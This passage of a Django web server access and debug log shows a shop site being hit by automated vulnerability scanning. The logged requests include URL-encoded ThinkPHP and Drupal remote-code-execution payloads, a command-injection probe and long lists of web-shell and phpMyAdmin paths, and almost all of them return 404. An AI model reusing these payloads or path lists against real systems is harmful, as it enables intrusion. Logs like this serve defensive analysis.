/index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6584 Not Found: /elrekt.php [31/Dec/2019 15:07:01] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6587 DEBUG 2019-12-31 15:07:03,076 utils 2749 140297243715328 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'App'; args=('App',) Not Found: /App/ [31/Dec/2019 15:07:03] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.0" 404 1754 Not Found: /index.php [31/Dec/2019 15:07:07] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6393 [31/Dec/2019 15:07:11] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.0" 302 0 [31/Dec/2019 15:08:25] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 15:08:25,524 utils 2749 140297243715328 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla'; args=('joomla',) Not Found: /joomla/ [31/Dec/2019 15:08:25] "GET /joomla/ HTTP/1.0" 404 1728 DEBUG 2019-12-31 15:08:26,052 utils 2749 140297243715328 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'Joomla'; args=('Joomla',) Not Found: /Joomla/ [31/Dec/2019 15:08:26] "GET /Joomla/ HTTP/1.0" 404 1728 [31/Dec/2019 15:08:27] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.0" 302 0 Not Found: /d7.php [31/Dec/2019 15:08:28] "GET /d7.php HTTP/1.0" 404 6328 Not Found: /1x.php [31/Dec/2019 15:08:31] "GET /1x.php HTTP/1.0" 404 6328 Not Found: /home.php [31/Dec/2019 15:08:33] "GET /home.php HTTP/1.0" 404 6334 Not Found: /spider.php [31/Dec/2019 15:08:36] "GET /spider.php HTTP/1.0" 404 6340 Not Found: /payload.php [31/Dec/2019 15:08:36] "GET /payload.php HTTP/1.0" 404 6343 Not Found: /composers.php [31/Dec/2019 15:08:37] "GET /composers.php HTTP/1.0" 404 6349 Not Found: /izom.php [31/Dec/2019 15:08:38] "GET /izom.php HTTP/1.0" 404 6334 Not Found: /composer.php [31/Dec/2019 15:08:39] "GET /composer.php HTTP/1.0" 404 6346 Not Found: /hue2.php [31/Dec/2019 15:08:40] "GET /hue2.php HTTP/1.0" 404 6334 Not Found: /Drupal.php [31/Dec/2019 15:08:47] "GET /Drupal.php HTTP/1.0" 404 6340 Not Found: /lang.php [31/Dec/2019 15:08:59] "GET /lang.php?f=1 HTTP/1.0" 404 6338 Not Found: /izom.php [31/Dec/2019 15:09:00] "GET /izom.php HTTP/1.0" 404 6334 Not Found: /new_license.php [31/Dec/2019 15:09:04] "GET /new_license.php HTTP/1.0" 404 6355 Not Found: /images/!.php [31/Dec/2019 15:10:19] "GET /images/!.php HTTP/1.0" 404 6346 Not Found: /images/vuln.php [31/Dec/2019 15:10:21] "GET /images/vuln.php HTTP/1.0" 404 6355 Not Found: /hd.php [31/Dec/2019 15:10:21] "GET /hd.php HTTP/1.0" 404 6328 Not Found: /images/up.php [31/Dec/2019 15:10:22] "GET /images/up.php HTTP/1.0" 404 6349 Not Found: /images/attari.php [31/Dec/2019 15:10:23] "GET /images/attari.php HTTP/1.0" 404 6361 Not Found: /images/jsspwneed.php [31/Dec/2019 15:10:23] "GET /images/jsspwneed.php HTTP/1.0" 404 6370 Not Found: /images/stories/cmd.php [31/Dec/2019 15:10:24] "GET /images/stories/cmd.php HTTP/1.0" 404 6376 Not Found: /images/stories/filemga.php [31/Dec/2019 15:10:27] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.0" 404 6399 Not Found: /up.php [31/Dec/2019 15:10:28] "GET /up.php HTTP/1.0" 404 6328 Not Found: /laravel.php [31/Dec/2019 15:10:28] "GET /laravel.php HTTP/1.0" 404 6343 Not Found: /huoshan.php [31/Dec/2019 15:10:35] "GET /huoshan.php HTTP/1.0" 404 6343 Not Found: /floaw.php [31/Dec/2019 15:10:46] "GET /floaw.php HTTP/1.0" 404 6337 Not Found: /doudou.php [31/Dec/2019 15:10:47] "GET /doudou.php HTTP/1.0" 404 6340 Not Found: /mjx.php [31/Dec/2019 15:10:48] "GET /mjx.php HTTP/1.0" 404 6331 Not Found: /xiaoxia.php [31/Dec/2019 15:10:49] "GET /xiaoxia.php HTTP/1.0" 404 6343 Not Found: /yuyang.php [31/Dec/2019 15:10:50] "GET /yuyang.php HTTP/1.0" 404 6340 Not Found: /zz.php [31/Dec/2019 15:10:51] "GET /zz.php HTTP/1.0" 404 6328 Not Found: /ak.php [31/Dec/2019 15:10:55] "GET /ak.php HTTP/1.0" 404 6328 Not Found: /baidoubi.php [31/Dec/2019 15:10:56] "GET /baidoubi.php HTTP/1.0" 404 6346 Not Found: /hhhhhh.php [31/Dec/2019 15:10:59] "GET /hhhhhh.php HTTP/1.0" 404 6340 Not Found: /meijianxue.php [31/Dec/2019 15:11:00] "GET /meijianxue.php HTTP/1.0" 404 6352 Not Found: /no1.php [31/Dec/2019 15:12:16] "GET /no1.php HTTP/1.0" 404 6331 Not Found: /python.php [31/Dec/2019 15:12:17] "GET /python.php HTTP/1.0" 404 6340 Not Found: /woshimengmei.php [31/Dec/2019 15:12:17] "GET /woshimengmei.php HTTP/1.0" 404 6358 Not Found: /indea.php [31/Dec/2019 15:12:18] "GET /indea.php HTTP/1.0" 404 6337 Not Found: /taisui.php [31/Dec/2019 15:12:20] "GET /taisui.php HTTP/1.0" 404 6340 Not Found: /xiaxia.php [31/Dec/2019 15:12:23] "GET /xiaxia.php HTTP/1.0" 404 6340 Not Found: /kk.php [31/Dec/2019 15:12:24] "GET /kk.php HTTP/1.0" 404 6328 Not Found: /xsser.php [31/Dec/2019 15:12:27] "GET /xsser.php HTTP/1.0" 404 6337 Not Found: /zzz.php [31/Dec/2019 15:12:31] "GET /zzz.php HTTP/1.0" 404 6331 Not Found: /dp.php [31/Dec/2019 15:12:42] "GET /dp.php HTTP/1.0" 404 6328 Not Found: /hs.php [31/Dec/2019 15:12:42] "GET /hs.php HTTP/1.0" 404 6328 Not Found: /1ts.php [31/Dec/2019 15:12:43] "GET /1ts.php HTTP/1.0" 404 6331 [31/Dec/2019 15:12:49] "GET / HTTP/1.0" 302 0 Not Found: /haiyan.php [31/Dec/2019 15:13:54] "GET /haiyan.php HTTP/1.0" 404 6340 Not Found: /phpdm.php [31/Dec/2019 15:13:54] "GET /phpdm.php HTTP/1.0" 404 6337 Not Found: /root.php [31/Dec/2019 15:13:55] "GET /root.php HTTP/1.0" 404 6334 Not Found: /5678.php [31/Dec/2019 15:13:56] "GET /5678.php HTTP/1.0" 404 6334 Not Found: /xiu.php [31/Dec/2019 15:14:01] "GET /xiu.php HTTP/1.0" 404 6331 Not Found: /wuwu11.php [31/Dec/2019 15:14:01] "POST /wuwu11.php HTTP/1.0" 404 6341 Not Found: /xw.php [31/Dec/2019 15:14:02] "POST /xw.php HTTP/1.0" 404 6329 Not Found: /xw1.php [31/Dec/2019 15:14:02] "POST /xw1.php HTTP/1.0" 404 6332 Not Found: /9678.php [31/Dec/2019 15:14:03] "POST /9678.php HTTP/1.0" 404 6335 Not Found: /wc.php [31/Dec/2019 15:14:04] "POST /wc.php HTTP/1.0" 404 6329 Not Found: /xx.php [31/Dec/2019 15:14:05] "POST /xx.php HTTP/1.0" 404 6329 Not Found: /xx.php [31/Dec/2019 15:14:06] "POST /xx.php HTTP/1.0" 404 6329 Not Found: /s.php [31/Dec/2019 15:14:06] "POST /s.php HTTP/1.0" 404 6326 Not Found: /w.php [31/Dec/2019 15:14:07] "POST /w.php HTTP/1.0" 404 6326 Not Found: /sheep.php [31/Dec/2019 15:14:07] "POST /sheep.php HTTP/1.0" 404 6338 Not Found: /qaq.php [31/Dec/2019 15:14:08] "POST /qaq.php HTTP/1.0" 404 6332 Not Found: /my.php [31/Dec/2019 15:14:11] "POST /my.php HTTP/1.0" 404 6329 Not Found: /qq.php [31/Dec/2019 15:14:15] "POST /qq.php HTTP/1.0" 404 6329 Not Found: /aaa.php [31/Dec/2019 15:14:16] "POST /aaa.php HTTP/1.0" 404 6332 Not Found: /hhh.php [31/Dec/2019 15:14:18] "POST /hhh.php HTTP/1.0" 404 6332 Not Found: /jjj.php [31/Dec/2019 15:14:25] "POST /jjj.php HTTP/1.0" 404 6332 Not Found: /vvv.php [31/Dec/2019 15:14:26] "POST /vvv.php HTTP/1.0" 404 6332 Not Found: /ffr.php [31/Dec/2019 15:14:28] "POST /ffr.php HTTP/1.0" 404 6332 Not Found: /411.php [31/Dec/2019 15:14:30] "POST /411.php HTTP/1.0" 404 6332 Not Found: /421.php [31/Dec/2019 15:14:36] "POST /421.php HTTP/1.0" 404 6332 Not Found: /444.php [31/Dec/2019 15:14:38] "POST /444.php HTTP/1.0" 404 6332 [31/Dec/2019 15:14:44] "GET / HTTP/1.0" 302 0 Not Found: /whoami.php [31/Dec/2019 15:15:57] "POST /whoami.php HTTP/1.0" 404 6341 Not Found: /whoami.php.php [31/Dec/2019 15:16:03] "POST /whoami.php.php HTTP/1.0" 404 6353 Not Found: /9.php [31/Dec/2019 15:16:04] "POST /9.php HTTP/1.0" 404 6326 Not Found: /981.php [31/Dec/2019 15:16:11] "POST /981.php HTTP/1.0" 404 6332 Not Found: /887.php [31/Dec/2019 15:16:13] "POST /887.php HTTP/1.0" 404 6332 Not Found: /888.php [31/Dec/2019 15:16:15] "POST /888.php HTTP/1.0" 404 6332 Not Found: /aa.php [31/Dec/2019 15:16:16] "POST /aa.php HTTP/1.0" 404 6329 Not Found: /bb.php [31/Dec/2019 15:16:21] "POST /bb.php HTTP/1.0" 404 6329 Not Found: /pp.php [31/Dec/2019 15:16:22] "POST /pp.php HTTP/1.0" 404 6329 Not Found: /tt.php [31/Dec/2019 15:16:24] "POST /tt.php HTTP/1.0" 404 6329 Not Found: /bbq.php [31/Dec/2019 15:16:24] "POST /bbq.php HTTP/1.0" 404 6332 Not Found: /7o.php [31/Dec/2019 15:16:35] "POST /7o.php HTTP/1.0" 404 6329 Not Found: /nb.php [31/Dec/2019 15:16:47] "POST /nb.php HTTP/1.0" 404 6329 Not Found: /kpl.php [31/Dec/2019 15:16:48] "POST /kpl.php HTTP/1.0" 404 6332 [31/Dec/2019 15:17:52] "GET / HTTP/1.0" 302 0 Not Found: /ppl.php [31/Dec/2019 15:17:56] "POST /ppl.php HTTP/1.0" 404 6332 Not Found: /tty.php [31/Dec/2019 15:17:57] "POST /tty.php HTTP/1.0" 404 6332 Not Found: /ooi.php [31/Dec/2019 15:17:57] "POST /ooi.php HTTP/1.0" 404 6332 Not Found: /aap.php [31/Dec/2019 15:17:59] "POST /aap.php HTTP/1.0" 404 6332 Not Found: /app.php [31/Dec/2019 15:17:59] "POST /app.php HTTP/1.0" 404 6332 Not Found: /bbr.php [31/Dec/2019 15:18:14] "POST /bbr.php HTTP/1.0" 404 6332 Not Found: /ioi.php [31/Dec/2019 15:18:15] "POST /ioi.php HTTP/1.0" 404 6332 Not Found: /uuu.php [31/Dec/2019 15:18:16] "POST /uuu.php HTTP/1.0" 404 6332 Not Found: /yyy.php [31/Dec/2019 15:18:16] "POST /yyy.php HTTP/1.0" 404 6332 Not Found: /ack.php [31/Dec/2019 15:18:17] "POST /ack.php HTTP/1.0" 404 6332 Not Found: /shh.php [31/Dec/2019 15:18:18] "POST /shh.php HTTP/1.0" 404 6332 Not Found: /ddd.php [31/Dec/2019 15:18:19] "POST /ddd.php HTTP/1.0" 404 6332 Not Found: /nnn.php [31/Dec/2019 15:18:20] "POST /nnn.php HTTP/1.0" 404 6332 Not Found: /ttt.php [31/Dec/2019 15:19:35] "POST /ttt.php HTTP/1.0" 404 6332 Not Found: /bbqq.php [31/Dec/2019 15:19:37] "POST /bbqq.php HTTP/1.0" 404 6335 Not Found: /tyrant.php [31/Dec/2019 15:19:38] "POST /tyrant.php HTTP/1.0" 404 6341 Not Found: /qiqi.php [31/Dec/2019 15:19:39] "POST /qiqi.php HTTP/1.0" 404 6335 Not Found: /qiqi1.php [31/Dec/2019 15:19:39] "POST /qiqi1.php HTTP/1.0" 404 6338 Not Found: /zhk.php [31/Dec/2019 15:19:40] "POST /zhk.php HTTP/1.0" 404 6332 Not Found: /bbv.php [31/Dec/2019 15:19:40] "POST /bbv.php HTTP/1.0" 404 6332 Not Found: /605.php [31/Dec/2019 15:19:41] "POST /605.php HTTP/1.0" 404 6332 Not Found: /admin1.php [31/Dec/2019 15:19:42] "POST /admin1.php HTTP/1.0" 404 6341 Not Found: /xi.php [31/Dec/2019 15:19:43] "POST /xi.php HTTP/1.0" 404 6329 Not Found: /999.php [31/Dec/2019 15:19:44] "POST /999.php HTTP/1.0" 404 6332 Not Found: /jsc.php [31/Dec/2019 15:19:44] "POST /jsc.php HTTP/1.0" 404 6332 Not Found: /jsc.php.php [31/Dec/2019 15:19:45] "POST /jsc.php.php HTTP/1.0" 404 6344 Not Found: /jsc.php [31/Dec/2019 15:19:45] "POST /jsc.php HTTP/1.0" 404 6332 Not Found: /11a.php [31/Dec/2019 15:19:46] "POST /11a.php HTTP/1.0" 404 6332 Not Found: /kkl.php [31/Dec/2019 15:19:46] "POST /kkl.php HTTP/1.0" 404 6332 Not Found: /ks1.php [31/Dec/2019 15:19:47] "POST /ks1.php HTTP/1.0" 404 6332 Not Found: /ooo.php [31/Dec/2019 15:19:47] "POST /ooo.php HTTP/1.0" 404 6332 Not Found: /wsx.php [31/Dec/2019 15:19:55] "POST /wsx.php HTTP/1.0" 404 6332 Not Found: /lz.php [31/Dec/2019 15:19:56] "POST /lz.php HTTP/1.0" 404 6329 Not Found: /zmp.php [31/Dec/2019 15:19:56] "POST /zmp.php HTTP/1.0" 404 6332 Not Found: /803.php [31/Dec/2019 15:19:57] "POST /803.php HTTP/1.0" 404 6332 Not Found: /zzz.php [31/Dec/2019 15:19:58] "POST /zzz.php HTTP/1.0" 404 6332 Not Found: /ze.php [31/Dec/2019 15:20:05] "POST /ze.php HTTP/1.0" 404 6329 Not Found: /nnb.php [31/Dec/2019 15:20:08] "POST /nnb.php HTTP/1.0" 404 6332 Not Found: /lkio.php [31/Dec/2019 15:20:09] "POST /lkio.php HTTP/1.0" 404 6335 Not Found: /mm.php [31/Dec/2019 15:20:10] "POST /mm.php HTTP/1.0" 404 6329 Not Found: /mmp.php [31/Dec/2019 15:20:16] "POST /mmp.php HTTP/1.0" 404 6332 Not Found: /hades.php [31/Dec/2019 15:20:17] "POST /hades.php HTTP/1.0" 404 6338 Not Found: /muma.php [31/Dec/2019 15:20:18] "POST /muma.php HTTP/1.0" 404 6335 Not Found: /seeyon/htmlofficeservlet [31/Dec/2019 15:21:50] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.0" 404 6382 Not Found: /secure/ContactAdministrators!default.jspa [31/Dec/2019 15:21:50] "GET /secure/ContactAdministrators!default.jspa HTTP/1.0" 404 6433 Not Found: /weaver/bsh.servlet.BshServlet [31/Dec/2019 15:21:54] "GET /weaver/bsh.servlet.BshServlet HTTP/1.0" 404 6397 Not Found: /index.php [31/Dec/2019 15:22:00] "POST /index.php HTTP/1.0" 404 6338 Not Found: /user/register [31/Dec/2019 15:22:02] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.0" 404 6587 [31/Dec/2019 15:22:03] "GET / HTTP/1.0" 302 0 Not Found: /user.php [31/Dec/2019 15:22:03] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.0" 404 6335 Not Found: /index.php [31/Dec/2019 15:22:04] "GET /index.php HTTP/1.0" 404 6337 Not Found: /phpmyadmin/index.php [31/Dec/2019 15:22:06] "GET /phpmyadmin/index.php HTTP/1.0" 404 6370 Not Found: /phpMyAdmin/index.php [31/Dec/2019 15:22:08] "GET /phpMyAdmin/index.php HTTP/1.0" 404 6370 [31/Dec/2019 15:22:54] "GET / HTTP/1.0" 302 0 Not Found: /pma/index.php [31/Dec/2019 15:24:26] "GET /pma/index.php HTTP/1.0" 404 6349 Not Found: /PMA/index.php [31/Dec/2019 15:24:30] "GET /PMA/index.php HTTP/1.0" 404 6349 Not Found: /pmamy/index.php [31/Dec/2019 15:24:32] "GET /pmamy/index.php HTTP/1.0" 404 6355 Not Found: /pmamy2/index.php [31/Dec/2019 15:24:33] "GET /pmamy2/index.php HTTP/1.0" 404 6358 Not Found: /mysql/index.php [31/Dec/2019 15:24:33] "GET /mysql/index.php HTTP/1.0" 404 6355 Not Found: /admin/index.php [31/Dec/2019 15:24:34] "GET /admin/index.php HTTP/1.0" 404 8782 Not Found: /db/index.php [31/Dec/2019 15:24:35] "GET /db/index.php HTTP/1.0" 404 6346 Not Found: /dbadmin/index.php [31/Dec/2019 15:24:37] "GET /dbadmin/index.php HTTP/1.0" 404 6361 Not Found: /web/phpMyAdmin/index.php [31/Dec/2019 15:24:41] "GET /web/phpMyAdmin/index.php HTTP/1.0" 404 6382 Not Found: /admin/PMA/index.php [31/Dec/2019 15:26:44] "GET /admin/PMA/index.php HTTP/1.0" 404 8794 Not Found: /admin/mysql/index.php [31/Dec/2019 15:26:48] "GET /admin/mysql/index.php HTTP/1.0" 404 8800 Not Found: /admin/mysql2/index.php [31/Dec/2019 15:26:48] "GET /admin/mysql2/index.php HTTP/1.0" 404 8803 Not Found: /admin/phpMyAdmin/index.php [31/Dec/2019 15:26:51] "GET /admin/phpMyAdmin/index.php HTTP/1.0" 404 8815 Not Found: /admin/phpmyadmin2/index.php [31/Dec/2019 15:26:53] "GET /admin/phpmyadmin2/index.php HTTP/1.0" 404 8818 Not Found: /mysqladmin/index.php [31/Dec/2019 15:27:00] "GET /mysqladmin/index.php HTTP/1.0" 404 6370 Not Found: /mysql-admin/index.php [31/Dec/2019 15:27:01] "GET /mysql-admin/index.php HTTP/1.0" 404 6373 Not Found: /mysql_admin/index.php [31/Dec/2019 15:27:01] "GET /mysql_admin/index.php HTTP/1.0" 404 6373 Not Found: /phpadmin/index.php [31/Dec/2019 15:27:02] "GET /phpadmin/index.php HTTP/1.0" 404 6364 Not Found: /phpAdmin/index.php [31/Dec/2019 15:27:03] "GET /phpAdmin/index.php HTTP/1.0" 404 6364 [31/Dec/2019 15:27:57] "GET / HTTP/1.0" 302 0 Not Found: /phpmyadmin1/index.php [31/Dec/2019 15:28:36] "GET /phpmyadmin1/index.php HTTP/1.0" 404 6373 Not Found: /phpmyadmin2/index.php [31/Dec/2019 15:28:39] "GET /phpmyadmin2/index.php HTTP/1.0" 404 6373 Not Found: /phpMyAdmin4.8.1/index.php [31/Dec/2019 15:28:56] "GET /phpMyAdmin4.8.1/index.php HTTP/1.0" 404 6385 Not Found: /phpMyAdmin4.8.2/index.php [31/Dec/2019 15:28:56] "GET /phpMyAdmin4.8.2/index.php HTTP/1.0" 404 6385 Not Found: /phpMyAdmin4.8.3/index.php [31/Dec/2019 15:28:57] "GET /phpMyAdmin4.8.3/index.php HTTP/1.0" 404 6385 Not Found: /phpMyAdmin4.8.4/index.php [31/Dec/2019 15:28:58] "GET /phpMyAdmin4.8.4/index.php HTTP/1.0" 404 6385 Not Found: /phpMyAdmin4.8.5/index.php [31/Dec/2019 15:28:59] "GET /phpMyAdmin4.8.5/index.php HTTP/1.0" 404 6385 Not Found: /myadmin/index.php [31/Dec/2019 15:29:00] "GET /myadmin/index.php HTTP/1.0" 404 6361 Not Found: /myadmin2/index.php [31/Dec/2019 15:30:40] "GET /myadmin2/index.php HTTP/1.0" 404 6364 Not Found: /xampp/phpmyadmin/index.php [31/Dec/2019 15:30:44] "GET /xampp/phpmyadmin/index.php HTTP/1.0" 404 6388 Not Found: /www/phpMyAdmin/index.php [31/Dec/2019 15:30:55] "GET /www/phpMyAdmin/index.php HTTP/1.0" 404 6382 Not Found: /tools/phpMyAdmin/index.php [31/Dec/2019 15:31:01] "GET /tools/phpMyAdmin/index.php HTTP/1.0" 404 6388 Not Found: /phpmyadmin-old/index.php [31/Dec/2019 15:32:25] "GET /phpmyadmin-old/index.php HTTP/1.0" 404 6382 Not Found: /phpMyAdminold/index.php [31/Dec/2019 15:32:26] "GET /phpMyAdminold/index.php HTTP/1.0" 404 6379 Not Found: /phpMyAdmin.old/index.php [31/Dec/2019 15:32:27] "GET /phpMyAdmin.old/index.php HTTP/1.0" 404 6382 Not Found: /pma-old/index.php [31/Dec/2019 15:32:33] "GET /pma-old/index.php HTTP/1.0" 404 6361 Not Found: /claroline/phpMyAdmin/index.php [31/Dec/2019 15:32:35] "GET /claroline/phpMyAdmin/index.php HTTP/1.0" 404 6400 Not Found: /phpma/index.php [31/Dec/2019 15:32:45] "GET /phpma/index.php HTTP/1.0" 404 6355 Not Found: /phpmyadmin/phpmyadmin/index.php [31/Dec/2019 15:32:47] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.0" 404 6403 Not Found: /phpMyAdmin/phpMyAdmin/index.php [31/Dec/2019 15:32:48] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.0" 404 6403 Not Found: /phpMyAbmin/index.php [31/Dec/2019 15:32:51] "GET /phpMyAbmin/index.php HTTP/1.0" 404 6370 [31/Dec/2019 15:33:00] "GET / HTTP/1.0" 302 0 Not Found: /phpMyAdmin__/index.php [31/Dec/2019 15:34:16] "GET /phpMyAdmin__/index.php HTTP/1.0" 404 6376 Not Found: /phpMyAdmin+++---/index.php [31/Dec/2019 15:34:17] "GET /phpMyAdmin+++---/index.php HTTP/1.0" 404 6388 Not Found: /phpmyadm1n/index.php [31/Dec/2019 15:34:23] "GET /phpmyadm1n/index.php HTTP/1.0" 404 6370 Not Found: /phpMyAdm1n/index.php [31/Dec/2019 15:34:24] "GET /phpMyAdm1n/index.php HTTP/1.0" 404 6370 Not Found: /shaAdmin/index.php [31/Dec/2019 15:34:35] "GET /shaAdmin/index.php HTTP/1.0" 404 6364 Not Found: /phpMyadmi/index.php [31/Dec/2019 15:34:36] "GET /phpMyadmi/index.php HTTP/1.0" 404 6367 Not Found: /phpMyAdmion/index.php [31/Dec/2019 15:34:37] "GET /phpMyAdmion/index.php HTTP/1.0" 404 6373 Not Found: /s/index.php [31/Dec/2019 15:34:37] "GET /s/index.php HTTP/1.0" 404 6343 Not Found: /MyAdmin/index.php [31/Dec/2019 15:34:40] "GET /MyAdmin/index.php HTTP/1.0" 404 6361 Not Found: /phpMyAdmin1/index.php [31/Dec/2019 15:34:51] "GET /phpMyAdmin1/index.php HTTP/1.0" 404 6373 Not Found: /pwd/index.php [31/Dec/2019 15:36:14] "GET /pwd/index.php HTTP/1.0" 404 6349 Not Found: /phpMyAdmina/index.php [31/Dec/2019 15:36:18] "GET /phpMyAdmina/index.php HTTP/1.0" 404 6373 Not Found: /phpMyAdmins/index.php [31/Dec/2019 15:36:21] "GET /phpMyAdmins/index.php HTTP/1.0" 404 6373 [31/Dec/2019 15:37:02] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 15:37:05,546 utils 2749 140297243715328 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'mb5q81mwcim6ak6kynd22rl60922c0w2' LIMIT 1; args=('mb5q81mwcim6ak6kynd22rl60922c0w2',) DEBUG 2019-12-31 15:37:05,548 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('mb5q81mwcim6ak6kynd22rl60922c0w2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T15:37:05.546941+00:00'::timestamptz); args=('mb5q81mwcim6ak6kynd22rl60922c0w2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 15, 37, 5, 546941, tzinfo=)) [31/Dec/2019 15:37:05] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /phpMyAdmin._2/index.php [31/Dec/2019 15:37:41] "GET /phpMyAdmin._2/index.php HTTP/1.0" 404 6379 Not Found: /phpMyAdmin333/index.php [31/Dec/2019 15:37:47] "GET /phpMyAdmin333/index.php HTTP/1.0" 404 6379 Not Found: /phpmyadmin3333/index.php [31/Dec/2019 15:37:49] "GET /phpmyadmin3333/index.php HTTP/1.0" 404 6382 Not Found: /php2MyAdmin/index.php [31/Dec/2019 15:37:59] "GET /php2MyAdmin/index.php HTTP/1.0" 404 6373 Not Found: /phpiMyAdmin/index.php [31/Dec/2019 15:37:59] "GET /phpiMyAdmin/index.php HTTP/1.0" 404 6373 [31/Dec/2019 15:38:03] "GET / HTTP/1.0" 302 0 Not Found: /1/index.php [31/Dec/2019 15:39:16] "GET /1/index.php HTTP/1.0" 404 6343 Not Found: /download/index.php [31/Dec/2019 15:39:17] "GET /download/index.php HTTP/1.0" 404 6364 Not Found: /phpMyAdmin_111/index.php [31/Dec/2019 15:39:18] "GET /phpMyAdmin_111/index.php HTTP/1.0" 404 6382 Not Found: /phpmadmin/index.php [31/Dec/2019 15:39:23] "GET /phpmadmin/index.php HTTP/1.0" 404 6367 Not Found: /321/index.php [31/Dec/2019 15:39:25] "GET /321/index.php HTTP/1.0" 404 6349 Not Found: /123131/index.php [31/Dec/2019 15:39:31] "GET /123131/index.php HTTP/1.0" 404 6358 Not Found: /phpMyAdminhf/index.php [31/Dec/2019 15:39:35] "GET /phpMyAdminhf/index.php HTTP/1.0" 404 6376 Not Found: /sbb/index.php [31/Dec/2019 15:39:36] "GET /sbb/index.php HTTP/1.0" 404 6349 Not Found: /WWW/phpMyAdmin/index.php [31/Dec/2019 15:39:40] "GET /WWW/phpMyAdmin/index.php HTTP/1.0" 404 6382 Not Found: /phpMyAdmln/index.php [31/Dec/2019 15:39:41] "GET /phpMyAdmln/index.php HTTP/1.0" 404 6370 Not Found: /phpMyAdmin_ai/index.php [31/Dec/2019 15:39:42] "GET /phpMyAdmin_ai/index.php HTTP/1.0" 404 6379 Not Found: /__phpMyAdmin/index.php [31/Dec/2019 15:39:43] "GET /__phpMyAdmin/index.php HTTP/1.0" 404 6376 Not Found: /program/index.php [31/Dec/2019 15:39:43] "GET /program/index.php HTTP/1.0" 404 6361 Not Found: /shopdb/index.php [31/Dec/2019 15:39:44] "GET /shopdb/index.php HTTP/1.0" 404 6358 Not Found: /phppma/index.php [31/Dec/2019 15:39:46] "GET /phppma/index.php HTTP/1.0" 404 6358 [31/Dec/2019 15:40:01] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2019-12-31 15:40:02,189 utils 2749 140297243715328 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '4xkvuo76wgp1ggid89osjeowgxa6gqyg' LIMIT 1; args=('4xkvuo76wgp1ggid89osjeowgxa6gqyg',) DEBUG 2019-12-31 15:40:02,191 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('4xkvuo76wgp1ggid89osjeowgxa6gqyg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T15:40:02.190386+00:00'::timestamptz); args=('4xkvuo76wgp1ggid89osjeowgxa6gqyg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 15, 40, 2, 190386, tzinfo=)) [31/Dec/2019 15:40:02] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 Not Found: /mysql/admin/index.php [31/Dec/2019 15:41:04] "GET /mysql/admin/index.php HTTP/1.0" 404 6373 Not Found: /mysql/dbadmin/index.php [31/Dec/2019 15:41:04] "GET /mysql/dbadmin/index.php HTTP/1.0" 404 6379 Not Found: /mysql/sqlmanager/index.php [31/Dec/2019 15:41:10] "GET 